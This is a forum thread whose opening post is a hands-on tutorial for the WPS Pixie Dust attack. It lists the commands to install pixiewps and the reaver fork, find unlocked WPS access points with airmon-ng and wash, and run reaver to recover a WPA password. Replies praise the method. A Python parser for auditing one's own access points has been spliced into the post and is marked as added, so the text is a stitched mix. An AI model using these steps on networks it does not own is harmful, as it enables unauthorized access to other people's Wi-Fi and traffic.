Tutorial: Exploiting WPS to Retrieve the WPA Password; Pixie Dust Attack
Exploiting WPS to Retrieve the WPA Password; Pixie Dust Attack #1
Explanation of Attack
Since cracking WPA passwords via brute-force is virtually impossible and not applicable in real-life situations, it should be avoided at all costs. Retrieving the password via social engineering (evil twin, etc.) is very advanced and, again, very rarely applicable. So, exploiting WPS is always the way to go - if the router has it enabled - which nearly every modern home (and probably some business) router has. Now, there are numerous ways to exploit WPS, and this is simply one of them.

First of all, you'll need to understand what WPS is. WPS stands for Wi-Fi Protected Setup; it is a wireless networking standard that tries to make connections between a router and wireless devices faster and easier. It works only for wireless networks that have WPA Personal or WPA2 Personal security. Click on the link to learn more.

So, we'll be utilizing a (somewhat) new attack coined the "Pixie Dust" attack, which essentially "reverse engineers" the 8-digit PIN on certain routers. What I mean is, this attack is specifically designed only for certain chipsets, meaning you might not have success on all routers. Simply try it, and if you fail, move on to another attack, such as using reaver to brute-force the damn PIN.

The Lab
In my case, I'll be using Kali Linux in a virtual machine. You'll also need a network adapter capable of the usual (monitor mode, etc.); I'd suggest one of the Alfa models, which also have a strong signal. If you're using a virtual machine, just attach your adapter to the machine.

Installing Dependencies; Required Packages to get the Attack Working
Simply install the packages below in order; make sure to update your package lists before doing so.
Code:
# refresh the package lists first, then install the build and runtime dependencies
apt-get update
apt-get install build-essential libpcap-dev sqlite3 libsqlite3-dev pixiewps

Downloading & Installing reaver-wps-fork-t6x
This is essentially a program that builds on what Reaver provides, slightly modified in order to support the attack.
Code:
git clone https://github.com/t6x/reaver-wps-fork-t6x
# the build lives in the src/ directory of the cloned repository
cd reaver-wps-fork-t6x/src/
./configure
make
make install

Finding & Extracting Information from Target
Enabling monitor mode on your wireless interface is required for extracting the information about the target.
Code:
airmon-ng start [interface]
wash -i [monitor interface]
Here you'll see a list of access points; on the right-hand side you'll see whether WPS is enabled or not. If it's 'No' under Locked, the attack might be plausible; if it's 'Yes', you're shit outta luck. Write down/copy the BSSID and channel number; we'll need them for the attack.

Exploitation
We've gathered the information and found out the target might be vulnerable - so shit, let's fire the lazer. Simply substitute your variables for mine and let the attack run. If it's vulnerable, you'll have the password within thirty minutes guaranteed; if it's not vulnerable, you'll get error codes/messages back.
Code:
reaver -i [monitor interface] -b [BSSID] -c [channel] -vvv -K 1 -f

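The wash table above is also the quickest way to check which of your own access points still advertise WPS and are not locked, so WPS can be switched off on them. The following Python parser is an added example, not code from the original post or from the reaver-wps-fork-t6x project; the column layout and the sample rows are constructed assumptions, which is why the parser keys off the header names rather than fixed offsets.

```python
import re
from collections import namedtuple

# Constructed sample in wash's (reaver-wps-fork-t6x) table layout; the column
# order is an assumption, so parsing keys off the header names, not offsets.
SAMPLE_WASH_OUTPUT = """\
BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
02:00:00:00:00:01    1  -41  2.0  No   ExampleV  office-2g
02:00:00:00:00:02    6  -67  2.0  Yes  ExampleV  guest net
02:00:00:00:00:03   11  -55  1.0  No   ExampleV  lab-ap
"""
BSSID_RE = re.compile(r"^[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}\s")
WpsAp = namedtuple("WpsAp", "bssid channel locked essid")

def parse_wash(text):
    """Turn wash's table into WpsAp records; ESSID is the last column and may contain spaces."""
    lines = text.splitlines()
    header = next((ln for ln in lines if ln.startswith("BSSID")), None)
    if header is None:
        raise ValueError("no wash header line found")
    cols = header.split()
    try:  # column names follow the assumed layout above; a different build may differ
        c_ch, c_lck, c_essid = cols.index("Ch"), cols.index("Lck"), cols.index("ESSID")
    except ValueError:
        raise ValueError("unexpected wash header; adjust the column names") from None
    aps = []
    for ln in lines:
        if not BSSID_RE.match(ln):
            continue  # header, separator and blank lines
        fields = ln.split(None, len(cols) - 1)
        if len(fields) == len(cols) - 1:
            fields.append("")  # hidden ESSID shows up as an empty trailing column
        elif len(fields) < len(cols):
            continue  # truncated row; do not guess at it
        aps.append(WpsAp(fields[0].upper(), int(fields[c_ch]),
                         fields[c_lck].lower() == "yes", fields[c_essid]))
    return aps

def wps_remediation_list(text, owned_bssids):
    """Our own APs that still advertise WPS and are not locked: fix these by disabling WPS."""
    owned = {b.upper() for b in owned_bssids}
    return [ap for ap in parse_wash(text) if ap.bssid in owned and not ap.locked]
```

Feed it `wash -i [monitor interface]` output captured to a file together with the BSSIDs of the APs you administer; anything it returns still has WPS enabled and unlocked.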

Happy hunting!
(This post was last modified: 10-20-2016, 11:41 PM by 817_091_278.)
If you need to get in contact with me, you may do so over ricochet. My identification is: ricochet:j27xararvgnbbnno.


RE: Exploiting WPS to Retrieve the WPA Password; Pixie Dust Attack #2
You can technically use whatever Linux-based operating system for this attack, although you'd have to install all the packages manually from the web; therefore, just using something like Kali Linux makes everything much simpler and quicker to accomplish.


RE: Exploiting WPS to Retrieve the WPA Password; Pixie Dust Attack #3
What a good tutorial. Thanks for posting this.


RE: Exploiting WPS to Retrieve the WPA Password; Pixie Dust Attack #4
(11-07-2016, 02:18 AM)pvnk Wrote: What a good tutorial. Thanks for posting this.

Much appreciated!

RE: Exploiting WPS to Retrieve the WPA Password; Pixie Dust Attack #5
This is definitely a good start for the n00bs. This method requires very little interaction. Great post!

RE: Exploiting WPS to Retrieve the WPA Password; Pixie Dust Attack #6
Thanks for this post. It was super helpful and a great read!


RE: Exploiting WPS to Retrieve the WPA Password; Pixie Dust Attack #7
Good tutorial. Clean and well formatted. I like to play around with wifi and this could be fun to try.

RE: Exploiting WPS to Retrieve the WPA Password; Pixie Dust Attack #8
air[enter specific tool here]-ng/reaver tutorials which have been repeated all over the internet 29384926794 x 10²³ times will never stop, will they?

Nice tutorial, I guess.
(This post was last modified: 11-26-2016, 03:44 AM by meow.)
If you're not hated, you're doing something wrong.


RE: Exploiting WPS to Retrieve the WPA Password; Pixie Dust Attack #9
Excellent tutorial from start to finish, that's well defined and elaborated.

I've cracked quite a few WPS PINs via Reaver itself, and although it did serve its purpose, it did fail at the best of times with the good old "WPS Transaction failed......Receive timeout occurred...".

I shall give this tutorial a shot.
Much appreciated.


RE: Exploiting WPS to Retrieve the WPA Password; Pixie Dust Attack #10
Note: Reaver does still technically involve brute-force, but it brute forces the WPS PIN which is way easier than bruting a WPA key.

I am Ender.